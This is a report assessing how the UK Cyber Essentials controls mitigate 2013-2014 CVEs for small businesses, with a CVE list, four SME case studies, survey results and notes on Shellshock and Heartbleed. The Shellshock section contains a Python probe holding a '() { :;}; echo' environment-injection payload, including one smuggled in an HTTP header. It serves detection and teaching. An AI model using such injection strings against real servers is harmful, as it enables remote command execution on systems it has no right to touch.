CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.


CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.


Survey Responses



policies in which all users are trusted, or where there is no consideration of risk to the system).

(As shown on Mitre.org's Terminology page [6] in March '15.)

To warrant a CVE entry in the Mitre list, individual vulnerabilities must place the affected system (or systems) into a state which either:

• allows an attacker to execute commands as another user;

• allows an attacker to access data that is contrary to the specified access restrictions for that data;

• allows an attacker to pose as another entity; or

• allows an attacker to conduct a denial of service.

High-Profile Vulnerabilities

Three specific high-profile vulnerabilities were also taken in addition to the randomly chosen 200, and have been assessed to determine to what extent the Cyber Essentials scheme would affect the vulnerability of SMEs in these situations.

Additionally, the applicability of these vulnerabilities to the SME networks we studied is included, along with the respective potential to harm operations.

Mitigation Assessment

The vulnerabilities chosen have been qualitatively assessed for mitigation with and without the use of the Cyber Essentials controls. The process considers each component of the controls in asserting whether each vulnerability would be mitigated, partially mitigated or not mitigated. The results are double-vetted to ensure correctness.

For each of the SMEs interviewed, each of the vulnerabilities is assessed for applicability to that network configuration. In cases where the vulnerability is for a specific model of hardware, the network is deemed applicable if it uses a like-product from the same vendor. In cases where the vulnerability is in software, only those referencing software in use or likely in use (based on the SME's practice) are deemed applicable to the network.


AnalysisT

he analysis of data collected has beensplit into sections firstly each of thevulnerabilities have been assessed to

ascertain their mitigation with and withoutthe use of the Cyber Essentials controlsthis supposes a case where any software orhardware source of a vulnerability is in use (iea worst-case fully inclusive assessment)

What follows is an analysis of the information gathered from interviews. Four SMEs from distinct industries are detailed in physical infrastructure and service usage, as well as current user access policies and existing security measures in place. A summary of the mitigation results for vulnerabilities in software and hardware used in each SME network configuration is included.

The full table of the applicability of all CVE vulnerabilities to each of the network structures can be found in the CVE Details section on page 19.

Finally, the data collected from the survey is analysed and used to develop a general-case network model; the SME networks are compared to this to better understand the nuances of each market sector, as well as the overall typical configuration of SMEs.

Full Vulnerabilities Assessment

Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials controls, 61 vulnerabilities were partially mitigated and 8 were not mitigated.

Figure 4: Percentage of Full Vulnerabilities List Mitigated

Partially Mitigated. 59 of the 61 CVEs judged as partially mitigated are so because they rely on patches from third-party software or hardware vendors, and will be mitigated once a security fix has been released. Whatever level of security tooling is deployed on a network, the security of third-party software unfortunately relies on the vendor's ability to identify potential areas of risk, as well as to respond quickly with patches as security flaws become apparent. All software installed on an SME network should be periodically reviewed to decide whether it is necessary, or whether more suitable and potentially more secure solutions are available.

The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding vulnerable web browser software. A secure configuration without such a browser would mitigate the vulnerability but, as in the Web Development SME case study, it may not always be possible to avoid the use of a specific piece of software. In such a case, website blacklisting is the only defence against these vulnerabilities.

Not Mitigated - Secure Configuration. Some vulnerabilities have been found to be unmitigable using the CE controls; in each of the cases found, this is due to inherent flaws in a hardware device or software that cannot be fixed by a security patch or firmware update.

For devices that are fundamentally flawed from a cyber-security standpoint, no level of security tooling on top of the network can aid in mitigation; rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme, to serve as a device blacklist for SMEs.

Case Studies

Four SMEs were interviewed to build paper models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.

• SME Network One represents a finance specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.

• SME Network Two represents a specialist SME utilising an off-site, remotely managed server for administrator services and cloud-based services for employees.

• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.

• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.

SME Network One - Finance Sector

Physical Infrastructure. The company interviewed comprised around 20 employees located at 3 sites nationally.

Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80, that is, unencrypted HTTP) to access services supplied by the company.

Figure 5: SME-1 Network

The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, DrayTek, BT and Huawei for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.

As most of the infrastructure is passive (most of the traffic is handled by a single 3Com 1000BASE-T switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.

Services. At the head office site, a Windows-compatible file server (Samba) provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.

Additionally, a web service and database server is run from a server at the site. This provides local HTTP access to the database it runs, as well as having firewall rules in place to allow external access to the same system for off-site employees.

Numerous other pieces of banking software are run on bank-owned remote servers and are accessed and secured via combinations of smart cards and PIN entry devices, also supplied by the banks.


User Access. Employees are permitted to access the internet from both their individual workstations and additional devices such as smartphones (although technically this is not permitted by policy, the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.

Access logs for network operations are not created, and any machine in the office can access the whole network, with no isolated islands.

User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.

Operating systems. Locally, everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.

Figure 6: SME-1 Vulnerability Mitigation

Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it places them in the firing line for a large number of browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, they end up with several different browsers, with several versions of each, to cover all their requirements, exposing them multiple times over to browser-based vectors.

Additionally, the heavy use of SSL-based communication places them in a position where any SSL vulnerabilities affect them too.

SME Network Two - Specialist Group

Physical Infrastructure. The second SME participant employs 20-25 people, based across multiple offices in one building.

Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators via SSH.

Network equipment includes an external Dell PowerEdge server, four TP-Link switch/access points and a TP-Link DHCP router.

Figure 7: SME-2 Network

Services. Employee devices sharing the network can use Windows folder sharing. Employee devices run OS X, Windows XP, Windows 7 and Windows 8, with auto-updates enabled. Note that Windows XP left extended support in April 2014, so auto-updates no longer deliver security fixes for those machines.

Some employees use a VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: email, files and database, as well as management tools; these are used daily.

User Access. Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity is logged. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.

Figure 8: SME-2 Vulnerability Mitigation

The specialist SME had the fewest potential vulnerabilities overall, largely owing to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerabilities in the local network, responsibility is handed to the service provider chosen. A certified and reputable cloud services provider should thus be sought, to ensure protection through the entire chain.

SME Network Three - Web Development

Physical Infrastructure. SME-3 employs 10 workers based in one building.

Employees are restricted from using their own devices unless a device is validated by the company head, in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.

Network equipment includes an external Dell PowerEdge server, one TP-Link switch/access point and a TP-Link DHCP router.

Figure 9: SME-3 Network

Services. Employee devices sharing the network can use Windows folder sharing. Employee devices run OS X, Windows 7 and Windows 8, with auto-updates enabled.

All services are provided by cloud servers via HTTPS: email, files and database, as well as management tools; these are used daily.

User Access. Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.

Guests are not permitted on the network, but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and cloud service access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 116 were applicable to the third SME network.

Figure 10: SME-3 Vulnerability Mitigation

The requirement for web development SMEs to operate across multiple web browsers, on various versions, to test and build a customer's website means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place for testing work.

When working in alternative browsers, employees should only access client pages where the developer has control of the web content.

SME Network Four - Hotel Services

Figure 11: SME-4 Network

Physical Infrastructure. This company is located at a single site and has equipment comprising a single desktop PC and 2 company laptops running behind an ADSL router; this same router also provides the internet connection for guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through a secondary access point name (SSID), filtering traffic into a separate VLAN internal to the router.

Services. No local servers are present to provide any service to employees or guests on the network.

File storage is provided through online services, including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed over SSL-secured connections (mainly HTTPS).

User Access. User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems. The company uses iOS for its mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so there will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing Security Measures. Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do, however, have automatic patch installation configured and have the Kaspersky antivirus suite installed.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.

Figure 12: SME-4 Vulnerability Mitigation

Similarly to SME 1, SME 4 requires the use of web browsers for bookings and reception of guests, so enables a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use have not either, leaving them open to attack.

Survey Responses

Data gathered from survey responses affords a much broader look at typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure. The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation, and could be considered representative of businesses across the UK.

Services. Local: file, email, database and domain servers are the most common local services, all present in more than a third of SMEs. Remote: email, web hosting and file sharing are the most common services provided remotely.

User Access. More than half of SMEs permit employees' own devices to be used in the workplace. For organisations such as these, it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine exposes the whole company.

Existing Security Measures. Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below these are access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.

Survey Respondents Network

The network built from survey respondents' data considers the overall response, in order to build a network easily adaptable to match the majority of SME network configurations.

Locally, email and file servers have been represented, with domain controller capabilities, behind a network ADSL router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.


Figure 13: Adaptable Survey-Response Network

Typicality of Case-Study SMEs

Within the survey respondents' network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information is likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.


Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media between spring 2014 and early 2015.

These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.

"ShellShock"

Also known by the name "BashDoor", Shellshock hit the news as it affected Bash on Linux and other Unix-like server environments, and did so in a particularly effective manner.

"GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix."

CVE-2014-6271 [13]

The bug allows an attacker who can control the value of an environment variable to execute arbitrary shell commands on a vulnerable system, because Bash evaluated the text following an exported function definition when it imported the environment. It is not a remote entry point by itself: it needs a service that places attacker-supplied input into the environment before invoking Bash, such as a CGI script under Apache (request headers become HTTP_* variables), ForceCommand in OpenSSH, or a DHCP client hook script. Where such a path exists, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix-based servers for services (mail servers, for example), as they would potentially have no idea that they had been compromised.
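As an added example (written for this edit, not taken from the report), the Python below does two things a practitioner would want after reading the above: it runs the standard environment-variable probe for CVE-2014-6271 against the local Bash, and it shows how a CGI gateway turns request headers into environment variables, which is the step that hands a remote client control of the environment. The HTTP request it builds is constructed; a current, patched Bash will report "not-vulnerable" and ignore the injected header.

```python
"""CVE-2014-6271 probe and CGI-vector demonstration. Example code written
for this edit; the request headers below are constructed, not captured."""
import os
import shutil
import subprocess

# The widely used probe string: an exported function definition followed by
# a trailing command. Vulnerable Bash runs the trailing command while
# importing the function from the environment; patched Bash does not.
PROBE = "() { :;}; echo vulnerable"


def shellshock_check(bash_path=None):
    """Return 'vulnerable', 'not-vulnerable' or 'bash-not-found'."""
    bash = bash_path or shutil.which("bash")
    if bash is None:
        return "bash-not-found"
    env = {"PATH": os.environ.get("PATH", ""), "x": PROBE}
    result = subprocess.run([bash, "-c", "echo probe-done"], env=env,
                            capture_output=True, text=True, timeout=10)
    # Only stdout matters: patched Bash may warn on stderr but prints nothing extra.
    return "vulnerable" if "vulnerable" in result.stdout else "not-vulnerable"


def cgi_env_from_request(headers):
    """Map HTTP request headers to CGI meta-variables (RFC 3875): HTTP_
    prefix, upper case, '-' replaced by '_'. A web server does exactly this
    before running a CGI script, so header values become environment values."""
    return {"HTTP_" + name.upper().replace("-", "_"): value
            for name, value in headers.items()}


def run_cgi_script(script_body, headers, bash_path=None):
    """Run a Bash CGI script with the environment a gateway would build from
    the given headers. Returns the script's stdout, or None if bash is absent."""
    bash = bash_path or shutil.which("bash")
    if bash is None:
        return None
    env = {"PATH": os.environ.get("PATH", "")}
    env.update(cgi_env_from_request(headers))
    result = subprocess.run([bash, "-c", script_body], env=env,
                            capture_output=True, text=True, timeout=10)
    return result.stdout


if __name__ == "__main__":
    print("local bash:", shellshock_check())
    # Constructed request: the User-Agent carries the Shellshock payload.
    headers = {"User-Agent": "() { :;}; echo injected-by-header",
               "Host": "example.invalid"}
    script = 'echo "Content-Type: text/plain"; echo; echo hello'
    print("cgi output:", run_cgi_script(script, headers))
```

The CGI script itself never touches the User-Agent header; on a vulnerable Bash the injected command would run anyway, before the script's first line, which is why patching Bash (rather than auditing individual scripts) is the mitigation and why the report places this under patch management.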

"Heartbleed"

Appearing in April 2014, the CVE-2014-0160 (aka "Heartbleed") bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target process.

As described in the original CVE report:

"The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug."

CVE-2014-0160 [12]

As OpenSSL is a core part of many applications and services, in both the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-unpatched servers still online) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on their individual deployments.

